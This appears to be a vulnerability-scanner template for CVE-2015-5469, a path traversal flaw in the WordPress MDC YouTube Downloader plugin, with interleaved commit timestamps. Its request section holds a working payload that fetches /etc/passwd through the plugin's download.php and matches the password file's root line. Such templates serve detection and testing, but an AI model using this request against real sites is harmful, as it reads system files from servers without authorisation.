2022-08-12 02:52:43 +00:00
id : CVE-2015-5469
info :
2022-08-31 19:11:18 +00:00
name : Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
2022-08-12 02:52:43 +00:00
author : 0x_Akoko
severity : high
description : Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
reference :
- https://www.openwall.com/lists/oss-security/2015/07/10/5
- https://www.cvedetails.com/cve/CVE-2015-5469/
2022-08-31 19:27:02 +00:00
- http://www.vapid.dhs.org/advisory.php?v=133
- http://www.openwall.com/lists/oss-security/2015/07/10/5
2022-08-12 02:52:43 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2015-5469
cwe-id : CWE-22
tags : cve,cve2015,wp,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200